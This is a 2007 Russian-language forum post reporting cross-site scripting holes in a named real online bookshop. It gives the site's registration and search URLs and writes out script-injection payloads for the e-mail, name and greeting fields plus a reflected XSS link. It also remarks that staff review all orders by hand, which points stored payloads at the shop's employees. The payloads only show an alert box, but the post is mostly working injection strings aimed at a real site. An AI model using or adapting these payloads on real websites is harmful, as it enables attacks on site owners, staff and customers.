26.04.2007, 09:11
|
|
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме:
682079
Репутация:
137
|
|
http://ismart.ee/
Интернет магазин по продаже книг. Искал где купить "Красный Лондон", нашел XSS : )
При регистарации (
Код:
http://ismart.ee/Books.dll/login?next=index
)
уязвимы поля:
1. E-mail; - вписываем
Код:
qwe@qwe.ru"><script>alert(/xss/)</script>
2. Ваше имя. - вписаваем
Код:
<script>alert(/xss/)</script>
Далее можно изменить приветствие на
Код:
<script>alert(/xss/)</script>
, тоже работает.
Все заказы просматриваются вручную кстати 
И напоследок пассивная XSS, хотя это и не так интересно :
Код:
http://ismart.ee/Books.dll/find?fulltextfind=1&fastfind=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
|
|
|